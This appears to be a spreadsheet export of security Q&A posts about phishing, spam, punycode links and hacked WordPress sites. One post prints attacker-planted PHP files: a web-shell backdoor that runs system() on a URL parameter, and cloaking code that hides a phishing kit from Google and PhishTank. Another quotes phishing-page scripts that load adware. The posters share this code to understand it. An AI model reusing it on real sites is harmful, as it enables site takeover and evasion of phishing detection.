 &lt;p&gt;Update: the server seems compromised. If referrer is google-&amp;gt;activate malicious js code. Read more here: &lt;a href="http://www.axertion.com/tutorials/2013/08/wordpress-redirecting-to-malicious-url-when-referral-is-google-or-another-search-engine/" rel="nofollow noreferrer"&gt;http://www.axertion.com/tutorials/2013/08/wordpress-redirecting-to-malicious-url-when-referral-is-google-or-another-search-engine/&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;google&gt;&lt;phishing&gt;&lt;wordpress&gt;</t>
  </si>
  <si>
    <t>Whatsapp Unicode Phishing Link</t>
  </si>
  <si>
    <t>&lt;p&gt;I have been receiving messages from relatives that goes like this:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;AirAsia is rewarding everyone with 2 free plane tickets to celebrate 24 Years of quality service. Get your free ticket at: &lt;a href="http://airas%C3%AEa.com/free-tickets/" rel="nofollow noreferrer"&gt;http://airas√Æa.com/free-tickets/&lt;/a&gt; .&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;which is a unicode link to &lt;a href="http://xn--airasa-fwa.com/free-tickets/" rel="nofollow noreferrer"&gt;http://xn--airasa-fwa.com/free-tickets/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I am just really curious how a click on this link on phone could allow hackers to hijack my friends and relatives Whatsapp accounts? Trying to access this site on PC gives me a 404 error.&lt;/p&gt;
 &lt;p&gt;In the mean time I have asked those who sent me this message to use Whatsapp settings to log out from all computer sessions. Is that enough?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;&lt;strong&gt;Update 1:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I traced the phishing link to &lt;a href="http://com-cupons.com/aa/" rel="nofollow noreferrer"&gt;http://com-cupons.com/aa/&lt;/a&gt;, which uses js to redirect to &lt;a href="http://aldi-com-2018.com/aa/" rel="nofollow noreferrer"&gt;http://aldi-com-2018.com/aa/&lt;/a&gt;. This is the URL containing the actual contents my friends were looking at.&lt;/p&gt;
 &lt;p&gt;There was a link like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;a href="whatsapp://send?text=*AirAsia is rewarding everyone with 2 free plane tickets* to celebrate 24 Years of quality service. Get your free ticket at : http://airas√Æa.com/free-tickets/ ."&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;So I suppose that's why I am receiving those messages.&lt;/p&gt;
 &lt;p&gt;But I still can't figure out the intent of this phishing. Maybe it has something to do with this?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; &amp;lt;script type="text/javascript"&amp;gt;
  (function(){
  var foxscript = document.createElement('script');
  foxscript.src = '//js.foxpush.com/aldi-com-2018com.js?v='+Math.random();
  foxscript.type = 'text/javascript';
  foxscript.async = 'true';
  var fox_s = document.getElementsByTagName('script')[0];
  fox_s.parentNode.insertBefore(foxscript, fox_s);})();
  &amp;lt;/script&amp;gt;
  &amp;lt;body oncontextmenu="return false"&amp;gt;
  &amp;lt;!-- Global site tag (gtag.js) - Google Analytics --&amp;gt;
  &amp;lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-91015564-3"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script&amp;gt;
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-91015564-3');
  &amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;What does it actually do?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;&lt;strong&gt;Update 2:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Found out the phishing site actually tries to redirect users to &lt;code&gt;final.html&lt;/code&gt; under the same &lt;code&gt;aldi-com-2018&lt;/code&gt; domain. The site contains obfuscated javascript that I have no idea how to decipher, but it does contain this piece of code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=956139" async onerror="_tyzjj()" onloaded="_rxnhqlpp()"&amp;gt;&amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Google search on &lt;strong&gt;onclasrv&lt;/strong&gt; returns bunch of adware related results. I'm guessing that is the final intention then?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;whatsapp&gt;&lt;unicode&gt;</t>
  </si>
  <si>
    <t>Something phishy going on with email</t>
  </si>
  <si>
    <t>&lt;p&gt;I own my own domain. For a month or so I've been getting emails from addresses I don't know with "see attached image" or "find the attached invoice", with a zip/rar file attached. Of course, I deleted these.&lt;/p&gt;
 &lt;p&gt;Starting yesterday things have changed. I am receiving emails more frequently (several per day), and instead of being addressed to me, they are return emails (from random SMTP servers on the net), telling me that my message could not be delivered. The initial source of the message is spoofed to be some random name, at my domain. The message content still says things like "see the attached invoice" with what was (before the rejection) an attachment.&lt;/p&gt;
 &lt;p&gt;What might be going on here?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Should a service indicate the usage of multi-factor authentication by a user for building trust?</t>
  </si>
  <si>
    <t>&lt;p&gt;We all know that MFA done right can greatly increase the security of an online identity.&lt;/p&gt;
 &lt;p&gt;There are services around with a fundamental trust problem among the users. For example online market places and classifieds. As long as the user accounts can be compromised via phishing, all indicators of authenticity are worthless.&lt;/p&gt;
 &lt;p&gt;Would the public indication of MFA usage for an account a valid measure to strengthen the trust relationship? Of course, some factors have to be taken into account (especially since MFA activation) as well:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Duration of membership&lt;/li&gt;
 &lt;li&gt;Amount of successful transactions&lt;/li&gt;
 &lt;li&gt;Usage of a trusted (and consistent?) payment method&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;There's always the possibility that any user can go bad or that the fraud is planned long beforehand.&lt;/p&gt;
 &lt;p&gt;But are there any other major caveats? Do you think it is worth the effort?&lt;/p&gt;</t>
  </si>
  <si>
    <t>What is "Intentionally misleading Artificial Intelligence to create a misleading outcome" called?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm writing about a computer system that relies on Artificial Intelligence and the threats that this may include. One threat vector (for example) is to seed Bayesian AI with content to skew the outcome. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Assuming that AI can't tell the difference between a fact and fiction, what is the term used to intentionally bias the system so that a desired result is achieved?&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;"&lt;em&gt;Hacking&lt;/em&gt;" is too broad&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;"&lt;em&gt;phishing&lt;/em&gt;" is about misleading humans to disclose information. &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;"Fox-News-ing" humans seem to be the most appropriate analogy, but I need a term the already exists... or I can invent one, given that I define the term in the beginning of the paper. &lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;My draft is using the term "Foxing A.I." for now&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;cloud-computing&gt;&lt;threat-mitigation&gt;&lt;terminology&gt;&lt;documentation&gt;&lt;artificial-intelligence&gt;</t>
  </si>
  <si>
    <t>Are there any security risks in replying to an SMS message?</t>
  </si>
  <si>
    <t>&lt;p&gt;I routinely receive seemingly harmless SMS messages from unknown people. They're usually simple, like "Hi" or "Hello" or "Are you there?". This happens several times a week, and certainly often enough that it seems to be some sort of organized, ongoing effort to get me to reply. I'm trying to understand why someone (or several someones) would bother sending such messages.&lt;/p&gt;
 &lt;p&gt;Is this a known hacking/phishing technique? If so, is there useful information that someone can obtain just by sending an SMS message, and what can be determined if the recipient replies (assuming they don't include any personal or security information in the reply)?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;mobile&gt;&lt;phishing&gt;&lt;sms&gt;</t>
  </si>
  <si>
    <t>Google showing spam links on my site</t>
  </si>
  <si>
    <t>&lt;p&gt;When I search the name of my site on Google, I see site links description which are spammy and not related to my site. Sometimes when I click I get redirect to phishing sites.&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.google.com/search?q=moonthemes" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/FFKam.png" alt="Google search results"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;But I have used many site cleaner tools, and they reported that my site is clean. I have checked my site in Google's webmaster tools for malware, it says no malware detected. Though Google webmaster tools did show about 290 crawl errors, which are unknown links like &lt;code&gt;payday-medcine-money-45451212.html&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;My site is in Wordpress, I have looked at themes files and found backdoor.&lt;/p&gt;
 &lt;p&gt;I don't know what to do, is this malware harmful for my website? How can I get my wordpress site clean?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;malware&gt;&lt;wordpress&gt;</t>
  </si>
  <si>
    <t>Are there any good OSINT feeds related to phone phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;There are lots of feeds related to fraudulent and malicious domains and IPs, but we're seeing more and more social engineering attempts coming in via phone.&lt;/p&gt;
 &lt;p&gt;When these are reported to us, I'd like to document the phone number in our intelligence repository and cross-reference the number with our VoIP records to see who else in the organization they may have contacted.&lt;/p&gt;
 &lt;p&gt;The only problem is, we get very few reports and we don't know what numbers we don't know about. Manual searches yield a lot of other low-fidelity data on generic phone-scraping sites.&lt;/p&gt;
 &lt;p&gt;At the risk of seeking product recommendations, does any organization publish anything like the &lt;a href="https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt" rel="nofollow noreferrer"&gt;Emerging Threats IP blocklist&lt;/a&gt; but for phone numbers?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;phone&gt;&lt;social-engineering&gt;&lt;blacklist&gt;</t>
  </si>
  <si>
    <t>Securing login redirects</t>
  </si>
  <si>
    <t>&lt;p&gt;If somebody were accessing a protected page while logged out, they would be redirected to a login page:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;/login?next=/something/123/manage?sort=desc
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;If a successful login, they should be redirected to the page they have been intending to view:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;if verify_creds(user, password):
  login(user)
  return redirect(request.args['next'])
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;How to verify that an attacker cannot use the next parameter to visit a phishing site? Is it sufficient to check if next starts with &lt;code&gt;/&lt;/code&gt;, ie a relative link or should I try to check if its a valid path in my application?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;internet&gt;</t>
  </si>
  <si>
    <t>Why is tinyurl.com returning a phishing warning?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have been using tinyurl.com for years for conveniently marking frequently used long URLs. This morning I went to create a tinyurl and this is the first time I saw:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/wExBL.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/wExBL.png" alt="Screenshot of tinyurl.com: &amp;quot;Warning! Suspected phishing site ahead!&amp;quot;"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Questions:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;What authority has deemed this a phishing site?&lt;/li&gt;
 &lt;li&gt;Has the URL name been hijacked?&lt;/li&gt;
 &lt;li&gt;Maybe it is something that I've done or need to correct on my end?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I seek to have a better understand of why this is happening and its implications. I understand that link that redirects is a prime candidate for masking phishing sites, however, is the implication that the home page of tinyurl.com is a phishing site? Is there cause &lt;em&gt;not&lt;/em&gt; to go to tinyurl.com and create redirect links for my lengthy URLs?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Should we rethink our entire password strategy?</t>
  </si>
  <si>
    <t>&lt;p&gt;Passwords get discussed a lot on this site, and there's quite a lot for both users and sites to do, to stay in line with "best practice".&lt;/p&gt;
 &lt;p&gt;Web sites need a password strength policy, account lockout policy, and secure password storage with a slow, salted hash. Some of these requirements have usability impacts, denial of service risks, and other drawbacks. And it's generally not possible for users to tell whether a site actually does all this (hence plaintextoffenders.com).&lt;/p&gt;
 &lt;p&gt;Users are supposed to pick a strong password that is unique to every site, change it regularly, and never write it down. And carefully verify the identity of the site every time you enter your password. I don't think anyone actually follows this, but it is the supposed "best practice". &lt;/p&gt;
 &lt;p&gt;In enterprise environments there's usually a pretty comprehensive single sign-on system, which helps massively, as users only need one good work password. And with just one authentication to protect, using multi-factor is more practical. But on the web we do not have single sign-on; every attempt from Passport, through SAML, OpenID and OAuth has failed to gain a critical mass.&lt;/p&gt;
 &lt;p&gt;But there is a technology that presents to users just like single sign-on, and that is a password manager with browser integration. Most of these can be told to generate a unique, strong password for every site, and rotate it periodically. This keeps you safe even in the event that a particular web site is not following best practice. And the browser integration ties a password to a particular domain, making phishing all but impossible To be fair, there are risks with password managers "putting all your eggs in one basket" and they are particularly vulnerable to malware, which is the greatest threat at present.&lt;/p&gt;
 &lt;p&gt;But if we look at the technology available to us, it's pretty clear that the current advice is barking up the wrong tree. We should be telling users to use a password manager, not remember loads of complex passwords. And sites could simply store an unsalted fast hash of the password, forget password strength rules and account lockouts.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;password-management&gt;</t>
  </si>
  <si>
    <t>Is a mobile app more secure for mobile use than the "normal" website?</t>
  </si>
  <si>
    <t>&lt;p&gt;An untrained end user who uses a mobile web browser is vulnerable to phishing and &lt;a href="https://security.stackexchange.com/a/1911/396"&gt;can't easily verify the the authenticity&lt;/a&gt; (or security) of a website &lt;a href="https://security.stackexchange.com/a/1911/396"&gt;among other issues&lt;/a&gt;. Also, it is very easy to prevent even a knowledgeable user from detecting MITM by hiding the HTTPS icon, &lt;a href="https://security.stackexchange.com/a/9381/396"&gt;replacing it with a favicon&lt;/a&gt;, or many other tricks since most many browsers completely hide the entire URL.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Is a native application (perhaps with certificate/root cert &lt;a href="https://security.stackexchange.com/q/10101/396"&gt;validation&lt;/a&gt;) really the only way to achieve reliable, &lt;a href="https://security.stackexchange.com/q/2268/396"&gt;secure interaction&lt;/a&gt; with my back end services over HTTPS? &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Should I train my end users to not use a web browser, and use an "app" that is hard-coded to my URLs and optionally does additional certificate validation to reduce MITM risk? &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Should my web server go as far as detecting a mobile session, and prevent them from authenticating?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;tls&gt;&lt;mobile&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>When is phishing education going too far?</t>
  </si>
  <si>
    <t>&lt;p&gt;I currently work on the IT security team at my workplace in a senior role. Recently, I assisted management in designing the phishing / social engineering training campaigns, by which IT security will send out phishing "test" emails to see how aware the company employees are to spotting such emails.&lt;/p&gt;
 &lt;p&gt;We have adopted a highly targeted strategy based not only on the user's job role but also on the content such employees are likely to see. The content have been varied to include emails asking for sensitive content (e.g: updating a password) to fake social media posts, to targeted advertising.&lt;/p&gt;
 &lt;p&gt;We have been getting push back from end users that they have no way of distinguishing a legitimate email that they would receive day to day from truly malicious phishing emails. They have been requests to scale back the difficulty of these tests from our team.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edit to address some comments that say spear phishing simulations are too extreme / bad design of simulations&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;In analyzing the past results of phishing simulations, the users who clicked tended to show certain patterns. Also, one particular successful phish that resulted in financial loss (unnecessary online purchase) was pretending to be a member of senior management.&lt;/p&gt;
 &lt;p&gt;To respond to comments on depth of targeting / GDPR, methods of customization are based on public company data (i.e: job function), rather than private user data known to that person only. The "content that users are likey to see" is based on "&lt;strong&gt;typical scenarios&lt;/strong&gt;", &lt;strong&gt;not&lt;/strong&gt; what content users at our workplace see &lt;strong&gt;specifically&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Questions&lt;/strong&gt;&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;When is phishing education going too far?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Is pushback from the end users demonstrative that their awareness is still lacking and need further training, specifically the inability to recognize legitimate from malicious emails?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;user-education&gt;</t>
  </si>
  <si>
    <t>How to deal with spam that contains my personal details?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just noticed some spam in my inbox in GMail that is from a very suspicious e-mail address (partially redacted &lt;code&gt;anonymous@webXXXXXXX.ad.aruba.it&lt;/code&gt;) containing a link to a similarly suspect URL (&lt;code&gt;http://centrodeesteticaopalo.com/URL_PARMS_REDACTED&lt;/code&gt;). The root website by itself returns an empty page (only newlines and line feeds) and I am not going to follow the actual link because it contains parameters which likely could identify me to the server.&lt;/p&gt;
 &lt;p&gt;Ordinarily I wouldn't even give such an e-mail the time of day and consider it to maybe be a phishing attempt, but what I find particularly disturbing is that the e-mail contains my real name and street address, along with the text "Your request was approved, you can become acquainted with the agreement here:" and a link to the above redacted link.&lt;/p&gt;
 &lt;p&gt;I'm assuming that some business I had given my personal information to was breached, but I'm not sure what action I should take, or even if there is anything I can or should do. Is it safe to ignore? Assume I have frozen my report with all three reporting agencies and there is nothing I don't recognize on any of my current reports.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;identity-management&gt;</t>
  </si>
  <si>
    <t>How to stop wordpress attack with bot?</t>
  </si>
  <si>
    <t>&lt;p&gt;Here are some files that hackers modified.&lt;/p&gt;
 &lt;p&gt;Inside my WordPress installation, I found an unknown folder called &lt;code&gt;ID3&lt;/code&gt; inside of a folder called &lt;code&gt;ID3&lt;/code&gt;. &lt;/p&gt;
 &lt;p&gt;three files 
 1.bots.php&lt;/p&gt;
 &lt;p&gt;this is bots.php code &lt;/p&gt;
 &lt;p&gt;GNU nano 2.3.1&lt;br&gt;
  File: bots.php &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;? // Identify and block fake/bad bots
 $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
 if(isset($_GET['useragent'])){echo"&amp;lt;h1&amp;gt;deny_agent(bot)=('Yandex,Baiduspider,Acunetix,crossdomain,wwwroot,Exabot,NimbleCrawler,Octopus,OutfoxBot,ProPowerBot&amp;lt;/h1&amp;gt;&amp;lt;pre&amp;gt;"; system($_GET['us$
 $blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
 foreach($blocked_words as $word) {
  if (substr_count($hostname, $word) &amp;gt; 0) {
  header("HTTP/1.0 404 Not Found");
  die("&amp;lt;h1&amp;gt;404 Not Found&amp;lt;/h1&amp;gt;The page that you have requested could not be found.");
  }
 }
 $bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*$
 if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
  header('HTTP/1.0 404 Not Found');
  exit();
 } else {
  foreach($bannedIP as $ip) {
  if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
  header('HTTP/1.0 404 Not Found');
  die("&amp;lt;h1&amp;gt;404 Not Found&amp;lt;/h1&amp;gt;The page that you have requested could not be found.");
  }
  }
 }
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;this is index.php&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php
 $random = rand(0,100000).$_SERVER['REMOTE_ADDR'];
 $dst = substr(md5($random), 0, 5);
 function recurse_copy($src, $dst) {
  $dir = opendir($src);
  $result = ($dir === false ? false : true);
  if ($result !== false) {
  $result = @mkdir($dst);
  if ($result === true) {
  while(false !== ( $file = readdir($dir)) ) {
  if (( $file != '.' ) &amp;amp;&amp;amp; ( $file != '..' ) &amp;amp;&amp;amp; $result) {
  if ( is_dir($src . '/' . $file) ) {
  $result = recurse_copy($src . '/' . $file,$dst . '/' . $file);
  } else {
  $result = copy($src . '/' . $file,$dst . '/' . $file);
  }
  }
  }
  closedir($dir);
  }
  }
  return $result;
 }
 $src="fbs";
 recurse_copy( $src, $dst );
 header("location:".$dst."");
 exit;
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;this is v.php &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;?php
 $bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*"$
 if (in_array($_SERVER['REMOTE_ADDR'], $bannedIP)) {
  header('HTTP/1.0 404 Not Found');
  exit();
 } else {
  foreach($bannedIP as $ip) {
  if (preg_match('/' . $ip . '/', $_SERVER['REMOTE_ADDR'])) {
  header('HTTP/1.0 404 Not Found');
  die("&amp;lt;h1&amp;gt;404 Not Found&amp;lt;/h1&amp;gt;The page that you have requested could not be found.");
  }
  }
 }
 $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
 $blocked_words = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit",);
 foreach($blocked_words as $word) {
  if (substr_count($hostname, $word) &amp;gt; 0) {
  header("HTTP/1.0 404 Not Found");
  die("&amp;lt;h1&amp;gt;404 Not Found&amp;lt;/h1&amp;gt;The page that you have requested could not be found.");
  }
 }
 $count_hits = ("antibots.txt");
 $hits = file($count_hits);
 $hits[0]++;
 $fp = fopen($count_hits, "w");
 fputs($fp, "$hits[0]");
 fclose($fp);
 if ($hits[0] &amp;gt; 30) {
  $a = getenv("REMOTE_ADDR");
  $b = getenv("HTTP_USER_AGENT");
  $c = getenv("HOSTNAME");
  $ne = "Deny from $a";
  $file = "newips.php";
  $fp = fopen($file, "a");
  fwrite($fp, $ne);
  $n = "RewriteEngine on
 Options +FollowSymlinks
 RewriteCond %{HTTP_USER_AGENT} ^$b [OR]
 RewriteRule ^.* - [F,L]
 ";
  $file = "newuseragents.php";
  $fp = fopen($file, "a");
  fwrite($fp, $n);
  $a = getenv("REMOTE_ADDR");
  $b = getenv("HTTP_USER_AGENT");
  $c = getenv("HOSTNAME");
  GNU nano 2.3.1 File: v.php 
 $fp = fopen($count_hits, "w");
 fputs($fp, "$hits[0]");
 fclose($fp);
 if ($hits[0] &amp;gt; 30) {
  $a = getenv("REMOTE_ADDR");
  $b = getenv("HTTP_USER_AGENT");
  $c = getenv("HOSTNAME");
  $ne = "Deny from $a";
  $file = "newips.php";
  $fp = fopen($file, "a");
  fwrite($fp, $ne);
  $n = "RewriteEngine on
 Options +FollowSymlinks
 RewriteCond %{HTTP_USER_AGENT} ^$b [OR]
 RewriteRule ^.* - [F,L]
 ";
  $file = "newuseragents.php";
  $fp = fopen($file, "a");
  fwrite($fp, $n);
  $a = getenv("REMOTE_ADDR");
  $b = getenv("HTTP_USER_AGENT");
  $c = getenv("HOSTNAME");
  $data1 = file_get_contents('http://5.175.160.126/blockedbots.php');
  $a = strip_tags($data1);
  $data2 = file_get_contents('http://5.175.160.126/blockedagents.php');
  $b = strip_tags($data2);
  $data3 = file_get_contents('http://5.175.160.126/blockedhosts.php');
  $c = strip_tags($data3);
 }
 $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
 $blocked_words = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit",);
 foreach($blocked_words as $word) {
  if (substr_count($hostname, $word) &amp;gt; 0) {
  header("HTTP/1.0 404 Not Found");
  die("&amp;lt;h1&amp;gt;404 Not Found&amp;lt;/h1&amp;gt;The page that you have requested could not be found.");
  }
 }
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;And I found some random numbers (check screenshots) &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/UEUPV.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/UEUPV.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;What are those files? How can I stop this? Please tell me this file function? What did these files do?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;php&gt;&lt;wordpress&gt;</t>
  </si>
  <si>
    <t>Way to practically identify punycode in Chrome?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently read some articles about phishing with &lt;a href="https://wikipedia.org/wiki/Punycode" rel="noreferrer"&gt;punycode&lt;/a&gt;. To prevent it when using firefox, you simply type &lt;code&gt;about:config&lt;/code&gt; and turn the parameter &lt;code&gt;network.IDN_show_punycode = true&lt;/code&gt;. Now you can easily see if somebody tries to scam you. Well, I am using google chrome and I didn't find a practical way to get rid of the risk being deceived. You can look at the certificate, but I am not willing to do that everytime i click on a link... Any ideas?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google&gt;&lt;chrome&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is noreferrer enough to secure links?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is the use of &lt;code&gt;noreferrer&lt;/code&gt; enough for links that use &lt;code&gt;target="_blank"&lt;/code&gt; in order to avoid &lt;a href="https://en.wikipedia.org/wiki/Tabnabbing" rel="noreferrer"&gt;reverse tabnabbing&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;For context here is an explanation of the issue: &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever" rel="noreferrer"&gt;"Target=_blank - the most underestimated vulnerability ever"&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://mathiasbynens.github.io/rel-noopener/" rel="noreferrer"&gt;"About rel=noopener"&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://steemit.com/security/@gaottantacinque/steemit-and-the-internet-in-general-is-a-safe-place" rel="noreferrer"&gt;Steemit article on tabnabbing performed on social media&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;So my question is: what's the consequence of forgetting to add also &lt;code&gt;noopener&lt;/code&gt; and &lt;code&gt;nofollow&lt;/code&gt; (that I see used on most websites)?&lt;/p&gt;
 &lt;p&gt;Are there browsers that are affected by the lack of the last two attributes?&lt;/p&gt;
 &lt;p&gt;As far as I know &lt;a href="https://github.com/danielstjules/blankshield" rel="noreferrer"&gt;the safest solution is to launch the link in a new tab from a temporary iframe&lt;/a&gt; but I see some websites out there using only noreferrer so I was wondering if there's some issue using only noreferrer.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;xss&gt;&lt;phishing&gt;&lt;html&gt;</t>
  </si>
  <si>
    <t>Amazon gift card phishing/spam -- what's the point?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently received an email message with the subject &amp;quot;San Diego Site Leadership and Management Team sent you an Amazon Gift Card!&amp;quot;, sent to my work address, apparently from &amp;quot;&lt;code&gt;Amazon.com Gift Cards &amp;lt;gc-orders@gc.email.amazon.com&amp;gt;&lt;/code&gt;&amp;quot;.&lt;/p&gt;
 &lt;p&gt;I was suspicious because there was no mention of my employer's name, just a generic message:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Please enjoy this $50.00 Amazon gift card to purchase&lt;br /&gt;
 an item of your choice to kick-off Q4 and in recognition&lt;br /&gt;
 of your hard work. We appreciate you!&lt;br /&gt;
 #SDThePlaceToBe&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;It included a plausible looking &amp;quot;Claim Code&amp;quot; for the gift card. The code resembles &amp;quot;TIAT-UTAHBX-3V4T&amp;quot;. (The actual code has the same pattern of uppercase letters and decimal digits.)&lt;/p&gt;
 &lt;p&gt;To be clear, I haven't clicked on any links in the email or tried to use the claim code, and I don't intend to.&lt;/p&gt;
 &lt;p&gt;I checked with my employer, who confirmed that they had not sent it, and with Amazon support, who confirmed that I had not been sent an email gift card.&lt;/p&gt;
 &lt;p&gt;So far, this sounds like an ordinary phishing attempt, which I would just report and ignore, but here's the strange part.&lt;/p&gt;
 &lt;p&gt;I've examined the headers and saw no suspicious links. There were several links within the email (none of which I clicked) that led to amazon.com URLs, plus sharing links at the bottom for Facebook, Twitter, Instagram, and Pinterest. As far as I can tell, even if I fell for this phishing attempt, no information would get back to whoever sent it. The claim code is presumably invalid, but if I tried to redeem it I presume it would simply fail (that's according to Amazon support).&lt;/p&gt;
 &lt;p&gt;So my question is -- what's the point? Is this kind of phishing email &lt;strong&gt;without&lt;/strong&gt; any dangerous links common? Is there any way the sender could benefit, or harm me, if I clicked on a link that goes to an amazon.com address?&lt;/p&gt;
 &lt;p&gt;I'm hesitant to share the entire message, but please let me know if more information would be helpful.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How do I deal with companies that call and ask for personal information?</t>
  </si>
  <si>
